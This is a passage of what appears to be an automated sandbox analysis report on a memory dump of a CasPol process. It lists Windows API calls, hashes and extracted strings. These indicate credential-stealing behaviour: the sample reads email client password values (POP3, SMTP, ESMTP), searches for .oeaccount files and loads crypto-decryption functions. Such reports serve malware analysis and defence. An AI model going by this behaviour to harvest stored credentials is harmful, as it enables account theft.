                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                      • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Closememset$EnumOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1938129365-0
                                                                                                                                                                                                                    • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                                    • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Enum
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2928410991-0
                                                                                                                                                                                                                    • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                                    • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                                                    • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                                    • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                                    • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0040CF3F,00000000,00000000,00000000,?,?,0040D05D), ref: 0040C591
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                                                    • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                    • API String ID: 52435246-1534328989
                                                                                                                                                                                                                    • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                                    • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                                                    • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                    • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3116012682-0
                                                                                                                                                                                                                    • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                                    • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                    • API String ID: 1865533344-362086290
                                                                                                                                                                                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                                    • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                                    • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
